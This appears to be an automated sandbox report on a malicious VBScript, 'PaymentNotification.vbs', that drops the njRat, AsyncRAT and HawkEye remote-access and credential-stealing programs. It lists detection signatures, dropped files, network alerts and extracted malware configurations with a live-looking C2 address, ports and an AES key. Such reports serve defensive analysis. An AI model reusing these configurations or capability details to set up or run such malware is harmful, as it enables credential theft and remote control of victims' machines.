Analysis Report PaymentNotification.vbs

Overview

General Information

Sample Name: PaymentNotification.vbs
Analysis ID: 399489
MD5: f5b9f4ae6470dd78d53b60dcc6b32a5b
SHA1: c12a160ff346463dfea1a2a5b015b0efd56a9645
SHA256: 3fb7c96dcb667562f755e56f05a892aa8326d0c905055f1ea75177e1785df46b
Tags: vbs
Infos:

Most interesting Screenshot:

Detection

HawkEye njRat AsyncRAT MailPassView
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for dropped file
Benign windows process drops PE files
Detected HawkEye Rat
Detected njRat
Detected unpacking (overwrites its own PE header)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
VBScript performs obfuscated calls to suspicious functions
Yara detected AsyncRAT
Yara detected HawkEye Keylogger
Yara detected MailPassView
Yara detected Njrat
.NET source code contains potential unpacker
.NET source code references suspicious native API functions
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Changes the view of files in windows explorer (hidden files and folders)
Connects to many ports of the same IP (likely port scanning)
Contains functionality to log keystrokes (.Net Source)
Drops PE files to the startup folder
Injects a PE file into a foreign processes
Machine Learning detection for dropped file
May check the online IP address of the machine
Modifies the windows firewall
Sample uses process hollowing technique
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Instant Messenger accounts or passwords
Tries to steal Mail credentials (via file access)
Tries to steal Mail credentials (via file registry)
Uses netsh to modify the Windows network and firewall settings
Writes to foreign memory regions
Yara detected WebBrowserPassView password recovery tool
AV process strings found (often used to terminate AV products)
Antivirus or Machine Learning detection for unpacked file
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains capabilities to detect virtual machines
Contains functionality for read data from the clipboard
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains long sleeps (>= 3 min)
Creates a DirectInput object (often for capturing keystrokes)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May infect USB drives
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Stores files to the Windows start menu directory
Uses SMTP (mail sending)
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

AV Detection:

barindex
Antivirus detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\Tmp.exe Avira: detection malicious, Label: TR/Dropper.Gen
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\79c06ef4ef423d882819c4e66285ec85.exe Avira: detection malicious, Label: TR/Dropper.Gen7
Source: C:\Users\user\AppData\Local\Temp\pgr.exe Avira: detection malicious, Label: TR/Dropper.Gen7
Source: C:\Users\user\AppData\Local\Temp\tmp87E4.tmp.exe Avira: detection malicious, Label: TR/Dropper.Gen
Source: C:\Users\user\AppData\Roaming\servieda.exe Avira: detection malicious, Label: TR/Dropper.Gen
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Avira: detection malicious, Label: TR/AD.MExecute.lzrac
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Avira: detection malicious, Label: SPR/Tool.MailPassView.473
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\d4c6a6df7bab3dad31763de990c4ed82.exe Avira: detection malicious, Label: TR/Dropper.Gen
Found malware configuration
Source: 0000000C.00000000.429733559.00000000006E2000.00000002.00020000.sdmp Malware Configuration Extractor: AsyncRAT {"Server": "185.140.53.71", "Ports": "5622", "Version": "0.5.7B", "Autorun": "false", "Install_Folder": "%AppData%", "Install_File": "", "AES_key": "OZbfeCW3Ui2w9m0b2sdvXKLHncuuEV1i", "Mutex": "AsyncMutex_6SI8OkPnk", "AntiDetection": "false", "External_config_on_Pastebin": "null", "BDOS": "false", "Startup_Delay": "3", "HWID": "null", "Certificate": "MIIE8jCCAtqgAwIBAgIQALaURRywvfhLupCLKqRXsTANBgkqhkiG9w0BAQ0FADAaMRgwFgYDVQQDDA9Bc3luY1JBVCBTZXJ2ZXIwIBcNMjEwMzE5MjMyNjE5WhgPOTk5OTEyMzEyMzU5NTlaMBoxGDAWBgNVBAMMD0FzeW5jUkFUIFNlcnZlcjCCAiIwDQYJKoZIhvcNAQEBBQADggIPADCCAgoCggIBAIRg8P1eV241T+5WAoYUJpVxKCp2hnrddZER5q6SuwiuoY5WnvnSHE86fmx6xl/ElyDi0aYdKZQgsRV52AsagcOyXPkYTuqgLaJa0uNP/ccUgEF58GRW9G4hxQ0yFipum00HgR4BC17MH/JlxA70ruPgctyQjb155Y9SA/np83nMY49/v/FNGINUINX7VVQmJkXvhptA0Xg//bKsMYgvjpT7RTp+dgd9Sfl3zZN0vd/OWvtZmjqgWG3FcBdKRjeQU0s8yYApwwz/u+XKy39FcEiIgtDSL4JLpaqgPI07lKqei20ZTjt/AjefXLkBO9i9BJ6cSTUvJL9XmMeWtssOuCLqTg54AQPjvZMVYYvkBhoHEe33fBqgV0/+oIcZpVW2bnRKNN58O1OV7xfp7Uz/K5EoxBGpTI+9BwBf6YdIkPCPsdzkahw4Alz2dm0tR9PiTtvyed571Fse+LSYskswzbfN24cvE183EEfGDdoiCQC9HrIR84g+nkQQKYy5mj5j0BN4NxIW7iuhb2X+a3FlR45KTWpy/p627aKpMeSgG2+zG6Io3gaDSAZ+g6CA+jVqqU81S5PxgZOQk4IbCaJWeyN++/iHEyyFY12jpiNkbVwZWU18Bx48uAZIKBPvpAy7BehRNYRfziR/zErfpf96kYCbDYJzO6/7AkTfQfsO4xhxAgMBAAGjMjAwMB0GA1UdDgQWBBQHQJ8DQO/zUgjsn27YFy2w7xPmbjAPBgNVHRMBAf8EBTADAQH/MA0GCSqGSIb3DQEBDQUAA4ICAQAES/vZ9rtg1VF0ZlgPVaWR+J4hq/2Mo1LaJW6+VZmbsT/Kw/eZFxPiwCVqDuLXOk9zdBzQjaN+1jbFORJfRusSdwdAz3ELqtgWOHikAPc0oZfglzOT3wjQWEeahe82N8/FMU/s7gXQ03g2apinU3ySsgT9LdIkEtmwnJ6aLjLFWcKTS5t4hX1dsHSoLs2ulVV8vkTJzmEemZwsHTQmOU13q9B/cezpMx4X9AmoQFdiiGn7p9nsOce7dOD/hlFAVUszv9DY37Qwm12OSvxcP9U/vdVbV7GKkYNkZTzA4r3muyDO1/TMEgngfBFvOXFNlc1JQ+3E0AAoaciCjlGuNbjisKnch5/xrHYe+Lnz3lHhbk6ertrNlT10pfZVrOli47RwIgZhdCmg3915G5n0MaTHUHsUBUET5KTV90kNLTLQLwNq82/0HPWzdFRxJy0RNosBON2awrb8q0Y4N+qVBti0tfpu67a0rwzsZFGEIMIFWvM0JUM8EUrVj86ga7urRpaI/5Al89x4FUeNy3ojdpTRYq3flCWKsnk9p7cMhYXINWZFWdMa1IGGCmlK3YFoEczXqu9D6+zL8Z+xV+pj6rmwzX6PW9RqHIley0P7QBH8iE4AFY1p5PJorWqfs2d68CQuFXOPIunsKtcOzM30OSGck0r6l91Qpdyznv5RK6xaJA==", "ServerSignature": "ISWHB6EJmpETXkSrzzZO+4XR+tFBGrUqWIQgiq+f/Z1utnjjrtR9Zd9ssjAfbUEKoKn1g5ZnXJ3OdA2+5VA6HMPOcjGqbLku4qqYmiWI7nnOg4wV5tgp8fhdBCrJNoe6zLWGVZRFo+FFrnPI9SVkByKFSctFCK2mRMxEPMsqBuOB2yM9abBbLKED5R7WLkNZ9wqoIP6gwufU1ji8pjdVCuYo3OuhkgBL0kjZX3grqk0fHZ4BxsLsdNQMBgTw+W9NV4bKcuxgOo0V6O84Hir+6xsmY32AvEiVEz4+M3CBkWuNsnkjTcKfLI2LJ8Fi2EX6yBS96WSiOpUHxlD+MUGfyDF2QV3Q9nzCyUPTTr04mdeFDpoldcn0kHpsSpyVu1WuW1KS2AN4WdIlSJTOnfm68B/YiVAGvMeZ88eHdnLidkNioBDUtDk5PcS9sTLx0Xorr7wHQf7Fafjphg7NnxrxKOMBhv7k0bUGw3CSqjh/b/SPBjNTohLC1UtOS2tkNuF6syz5zwJ3Id+szSG3tX37C437dOug2ETg7x/O7F9QO/KMDbZ8whpW3X7W0v0mRk9pq0SnEW9Di48x/4FMvNzeTl6n7QV1Bgpv6HZsc3yHpKwz6fYjwhFfzP3WTUSi5cyzFj/bkfk7XJnmM+iNyBmyQoYBMs9OwGuAmLhJD3+yAoU=", "Group": "CONTACTS"}
Source: 0.3.wscript.exe.1b86717d130.5.raw.unpack Malware Configuration Extractor: Njrat {"Campaign ID": "SPRINGLES", "Version": "0.7d", "Install Name": "server.exe", "Install Dir": "TEMP", "Registry Value": "79c06ef4ef423d882819c4e66285ec85", "Host": "185.140.53.71", "Port": "3429", "Network Seprator": "|'|'|", "Install Flag": "False"}
Source: tmpFB21.tmp.exe.4928.13.memstr Malware Configuration Extractor: HawkEye {"Modules": ["WebBrowserPassView", "mailpv", "Mail PassView"], "Version": ""}
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\Tmp.exe Metadefender: Detection: 75% Perma Link
Source: C:\Users\user\AppData\Local\Temp\Tmp.exe ReversingLabs: Detection: 82%
Source: C:\Users\user\AppData\Local\Temp\pgr.exe Metadefender: Detection: 90% Perma Link
Source: C:\Users\user\AppData\Local\Temp\pgr.exe ReversingLabs: Detection: 91%
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\79c06ef4ef423d882819c4e66285ec85.exe Metadefender: Detection: 90% Perma Link
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\79c06ef4ef423d882819c4e66285ec85.exe ReversingLabs: Detection: 91%
Source: C:\Users\user\AppData\Roaming\servieda.exe Metadefender: Detection: 75% Perma Link
Source: C:\Users\user\AppData\Roaming\servieda.exe ReversingLabs: Detection: 82%
Multi AV Scanner detection for submitted file
Source: PaymentNotification.vbs Virustotal: Detection: 12% Perma Link
Source: PaymentNotification.vbs ReversingLabs: Detection: 17%
Yara detected Njrat
Source: Yara match File source: 00000000.00000003.361826559.000001B866181000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.375381174.00000000006AD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.434132652.00000000006AD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.386399141.00000000006AD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.418513533.00000000006AD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000000.364575966.00000000000A2000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.599389764.00000000000A2000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.431917812.00000000006AD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000000.355914114.00000000001D2000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.404397604.00000000006AD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.599254975.0000000000082000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.360210292.0000000000696000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.361022264.000001B86606A000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.416270861.00000000006AD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.407415597.00000000006AD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.379800367.00000000006AD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.361732058.000001B8660A7000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.409647935.00000000006AD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.608644673.00000000028C1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.429703452.00000000006AD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.363543444.000001B865F71000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.384190622.00000000006AD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.420692346.00000000006AD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.600750205.00000000006AA000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000000.392012717.0000000000A72000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.422988044.00000000006AD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.397417022.00000000006AD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.365445146.00000000001D2000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.388634565.00000000006AD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.381975904.00000000006AD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.390816638.00000000006AD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.414035813.00000000006AD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.399625080.00000000006AD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.395800979.0000000000A72000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.363508087.000001B865F8D000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.425183434.00000000006AD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.377587214.00000000006AD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.411854151.00000000006AD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.519777905.00000000006B0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.427394879.00000000006AD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.401942814.00000000006AD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.436364231.00000000006AD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.369408079.000001B867140000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000000.360863456.0000000000082000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: d4c6a6df7bab3dad31763de990c4ed82.exe PID: 2244, type: MEMORY
Source: Yara match File source: Process Memory Space: servieda.exe PID: 5648, type: MEMORY
Source: Yara match File source: Process Memory Space: wscript.exe PID: 5972, type: MEMORY
Source: Yara match File source: Process Memory Space: Tmp.exe PID: 240, type: MEMORY
Source: Yara match File source: Process Memory Space: pgr.exe PID: 1068, type: MEMORY
Source: Yara match File source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\79c06ef4ef423d882819c4e66285ec85.exe, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Roaming\servieda.exe, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\Tmp.exe, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\pgr.exe, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\d4c6a6df7bab3dad31763de990c4ed82.exe, type: DROPPED
Source: Yara match File source: 0.3.wscript.exe.1b86717d130.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.wscript.exe.1b8660a7cb0.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.wscript.exe.1b8660a7cb0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.wscript.exe.1b8660a7cb0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.d4c6a6df7bab3dad31763de990c4ed82.exe.a70000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.0.Tmp.exe.1d0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.wscript.exe.1b86717d130.5.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.wscript.exe.1b8660a7cb0.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.pgr.exe.80000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.0.pgr.exe.80000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.servieda.exe.a0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.0.servieda.exe.a0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.Tmp.exe.1d0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.0.d4c6a6df7bab3dad31763de990c4ed82.exe.a70000.0.unpack, type: UNPACKEDPE
Machine Learning detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\Tmp.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\79c06ef4ef423d882819c4e66285ec85.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\pgr.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\tmp87E4.tmp.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\servieda.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\d4c6a6df7bab3dad31763de990c4ed82.exe Joe Sandbox ML: detected
Antivirus or Machine Learning detection for unpacked file
Source: 13.2.tmpFB21.tmp.exe.8a0000.0.unpack Avira: Label: TR/AD.MExecute.lzrac
Source: 13.2.tmpFB21.tmp.exe.8a0000.0.unpack Avira: Label: SPR/Tool.MailPassView.473
Source: 13.0.tmpFB21.tmp.exe.8a0000.0.unpack Avira: Label: TR/AD.MExecute.lzrac
Source: 13.0.tmpFB21.tmp.exe.8a0000.0.unpack Avira: Label: SPR/Tool.MailPassView.473
Source: 1.0.Tmp.exe.1d0000.0.unpack Avira: Label: TR/Dropper.Gen
Source: 2.2.pgr.exe.80000.0.unpack Avira: Label: TR/Dropper.Gen7
Source: 2.0.pgr.exe.80000.0.unpack Avira: Label: TR/Dropper.Gen7
Source: 3.0.servieda.exe.a0000.0.unpack Avira: Label: TR/Dropper.Gen
Source: 2.2.pgr.exe.3a3fd88.3.unpack Avira: Label: TR/Inject.vcoldi
Source: 8.0.d4c6a6df7bab3dad31763de990c4ed82.exe.a70000.0.unpack Avira: Label: TR/Dropper.Gen

Compliance:

barindex
Detected unpacking (overwrites its own PE header)
Source: C:\Users\user\AppData\Local\Temp\Tmp.exe Unpacked PE file: 1.2.Tmp.exe.1d0000.0.unpack
Source: C:\Users\user\AppData\Roaming\servieda.exe Unpacked PE file: 3.2.servieda.exe.a0000.0.unpack
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\d4c6a6df7bab3dad31763de990c4ed82.exe Unpacked PE file: 8.2.d4c6a6df7bab3dad31763de990c4ed82.exe.a70000.0.unpack
Source: C:\Users\user\AppData\Local\Temp\Tmp.exe File opened: C:\Windows\WinSxS\amd64_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.9445_none_88df21dd2faf7c49\MSVCR80.dll Jump to behavior
Source: unknown HTTPS traffic detected: 207.241.227.114:443 -> 192.168.2.6:49699 version: TLS 1.2
Source: Binary string: C:\Users\Jovan\Documents\Visual Studio 2010\Projects\Stealer\CMemoryExecute\CMemoryExecute\obj\Release\CMemoryExecute.pdb source: pgr.exe, 00000002.00000002.611403829.00000000039DF000.00000004.00000001.sdmp, tmpFB21.tmp.exe, tmpFB21.tmp.exe.2.dr
Source: Binary string: f:\Projects\VS2005\mailpv\Release\mailpv.pdb source: pgr.exe, 00000002.00000002.611403829.00000000039DF000.00000004.00000001.sdmp, tmpFB21.tmp.exe, vbc.exe, tmpFB21.tmp.exe.2.dr
Source: Binary string: f:\Projects\VS2005\WebBrowserPassView\Release\WebBrowserPassView.pdb source: pgr.exe, 00000002.00000002.611403829.00000000039DF000.00000004.00000001.sdmp, tmpFB21.tmp.exe, vbc.exe, 0000000F.00000002.518251485.0000000000400000.00000040.00000001.sdmp, tmpFB21.tmp.exe.2.dr
Source: Binary string: mscorrc.pdb source: tmpFB21.tmp.exe, 0000000D.00000002.613320606.00000000058C0000.00000002.00000001.sdmp

Spreading:

barindex
May infect USB drives
Source: pgr.exe, 00000002.00000002.608644673.00000000028C1000.00000004.00000001.sdmp Binary or memory string: autorun.inf
Source: pgr.exe, 00000002.00000002.608644673.00000000028C1000.00000004.00000001.sdmp Binary or memory string: [autorun]
Source: tmpFB21.tmp.exe Binary or memory string: [autorun]
Source: tmpFB21.tmp.exe Binary or memory string: autorun.inf
Source: tmpFB21.tmp.exe.2.dr Binary or memory string: autorun.inf
Source: tmpFB21.tmp.exe.2.dr Binary or memory string: [autorun]
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe Code function: 14_2_00406EC3 FindFirstFileA,FindNextFileA,strlen,strlen, 14_2_00406EC3

Software Vulnerabilities:

barindex
Found inlined nop instructions (likely shell or obfuscated code)
Source: C:\Users\user\AppData\Local\Temp\Tmp.exe Code function: 4x nop then dec eax 1_2_00007FFD067D0ADD
Source: C:\Users\user\AppData\Roaming\servieda.exe Code function: 4x nop then dec eax 3_2_00007FFD067E0ADD
Source: C:\Users\user\AppData\Roaming\servieda.exe Code function: 4x nop then mov eax, dword ptr [ebp+00000128h] 3_2_00007FFD067E87B1
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\d4c6a6df7bab3dad31763de990c4ed82.exe Code function: 4x nop then dec eax 8_2_00007FFD06800ADD
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Code function: 4x nop then lea esp, dword ptr [ebp-0Ch] 13_2_02C914C0
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Code function: 4x nop then lea esp, dword ptr [ebp-0Ch] 13_2_02C99CC0
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Code function: 4x nop then lea esp, dword ptr [ebp-0Ch] 13_2_02C917F8
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Code function: 4x nop then jmp 02C91A73h 13_2_02C919A1
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Code function: 4x nop then jmp 02C91A73h 13_2_02C919B0
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Code function: 4x nop then lea esp, dword ptr [ebp-0Ch] 13_2_02C95B70
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Code function: 4x nop then lea esp, dword ptr [ebp-0Ch] 13_2_02C90728
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Code function: 4x nop then lea esp, dword ptr [ebp-0Ch] 13_2_02C96038
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Code function: 4x nop then mov esp, ebp 13_2_02C94830

Networking:

barindex
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic Snort IDS: 2021176 ET TROJAN Bladabindi/njRAT CnC Command (ll) 192.168.2.6:49706 -> 185.140.53.71:3429
Source: Traffic Snort IDS: 2019214 ET TROJAN njrat ver 0.7d Malware CnC Callback (Capture) 192.168.2.6:49706 -> 185.140.53.71:3429
Source: Traffic Snort IDS: 2022062 ET TROJAN njrat ver 0.7d Malware CnC Callback Response (File Manager) 185.140.53.71:3429 -> 192.168.2.6:49706
Source: Traffic Snort IDS: 2019216 ET TROJAN njrat ver 0.7d Malware CnC Callback (Message) 192.168.2.6:49706 -> 185.140.53.71:3429
Source: Traffic Snort IDS: 2030673 ET TROJAN Observed Malicious SSL Cert (AsyncRAT Server) 185.140.53.71:5622 -> 192.168.2.6:49715
Source: Traffic Snort IDS: 2019926 ET TROJAN HawkEye Keylogger Report SMTP 192.168.2.6:49726 -> 103.6.196.196:587
Source: Traffic Snort IDS: 2019926 ET TROJAN HawkEye Keylogger Report SMTP 192.168.2.6:49732 -> 103.6.196.196:587
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor URLs: 185.140.53.71
Connects to many ports of the same IP (likely port scanning)
Source: global traffic TCP traffic: 185.140.53.71 ports 5471,1,4,5,7,5622,3429
May check the online IP address of the machine
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe DNS query: name: whatismyipaddress.com
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe DNS query: name: whatismyipaddress.com
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe DNS query: name: whatismyipaddress.com
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe DNS query: name: whatismyipaddress.com
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe DNS query: name: whatismyipaddress.com
Detected TCP or UDP traffic on non-standard ports
Source: global traffic TCP traffic: 192.168.2.6:49705 -> 185.140.53.71:5471
Source: global traffic TCP traffic: 192.168.2.6:49726 -> 103.6.196.196:587
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: whatismyipaddress.comConnection: Keep-Alive
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 104.16.154.36 104.16.154.36
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: EXABYTES-AS-APExaBytesNetworkSdnBhdMY EXABYTES-AS-APExaBytesNetworkSdnBhdMY
JA3 SSL client fingerprint seen in connection with other malware
Source: Joe Sandbox View JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Uses SMTP (mail sending)
Source: global traffic TCP traffic: 192.168.2.6:49726 -> 103.6.196.196:587
Source: unknown TCP traffic detected without corresponding DNS query: 185.140.53.71
Source: unknown TCP traffic detected without corresponding DNS query: 185.140.53.71
Source: unknown TCP traffic detected without corresponding DNS query: 185.140.53.71
Source: unknown TCP traffic detected without corresponding DNS query: 185.140.53.71
Source: unknown TCP traffic detected without corresponding DNS query: 185.140.53.71
Source: unknown TCP traffic detected without corresponding DNS query: 185.140.53.71
Source: unknown TCP traffic detected without corresponding DNS query: 185.140.53.71
Source: unknown TCP traffic detected without corresponding DNS query: 185.140.53.71
Source: unknown TCP traffic detected without corresponding DNS query: 185.140.53.71
Source: unknown TCP traffic detected without corresponding DNS query: 185.140.53.71
Source: unknown TCP traffic detected without corresponding DNS query: 185.140.53.71
Source: unknown TCP traffic detected without corresponding DNS query: 185.140.53.71
Source: unknown TCP traffic detected without corresponding DNS query: 185.140.53.71
Source: unknown TCP traffic detected without corresponding DNS query: 185.140.53.71
Source: unknown TCP traffic detected without corresponding DNS query: 185.140.53.71
Source: unknown TCP traffic detected without corresponding DNS query: 185.140.53.71
Source: unknown TCP traffic detected without corresponding DNS query: 185.140.53.71
Source: unknown TCP traffic detected without corresponding DNS query: 185.140.53.71
Source: unknown TCP traffic detected without corresponding DNS query: 185.140.53.71
Source: unknown TCP traffic detected without corresponding DNS query: 185.140.53.71
Source: unknown TCP traffic detected without corresponding DNS query: 185.140.53.71
Source: unknown TCP traffic detected without corresponding DNS query: 185.140.53.71
Source: unknown TCP traffic detected without corresponding DNS query: 185.140.53.71
Source: unknown TCP traffic detected without corresponding DNS query: 185.140.53.71
Source: unknown TCP traffic detected without corresponding DNS query: 185.140.53.71
Source: unknown TCP traffic detected without corresponding DNS query: 185.140.53.71
Source: unknown TCP traffic detected without corresponding DNS query: 185.140.53.71
Source: unknown TCP traffic detected without corresponding DNS query: 185.140.53.71
Source: unknown TCP traffic detected without corresponding DNS query: 185.140.53.71
Source: unknown TCP traffic detected without corresponding DNS query: 185.140.53.71
Source: unknown TCP traffic detected without corresponding DNS query: 185.140.53.71
Source: unknown TCP traffic detected without corresponding DNS query: 185.140.53.71
Source: unknown TCP traffic detected without corresponding DNS query: 185.140.53.71
Source: unknown TCP traffic detected without corresponding DNS query: 185.140.53.71
Source: unknown TCP traffic detected without corresponding DNS query: 185.140.53.71
Source: unknown TCP traffic detected without corresponding DNS query: 185.140.53.71
Source: unknown TCP traffic detected without corresponding DNS query: 185.140.53.71
Source: unknown TCP traffic detected without corresponding DNS query: 185.140.53.71
Source: unknown TCP traffic detected without corresponding DNS query: 185.140.53.71
Source: unknown TCP traffic detected without corresponding DNS query: 185.140.53.71
Source: unknown TCP traffic detected without corresponding DNS query: 185.140.53.71
Source: unknown TCP traffic detected without corresponding DNS query: 185.140.53.71
Source: unknown TCP traffic detected without corresponding DNS query: 185.140.53.71
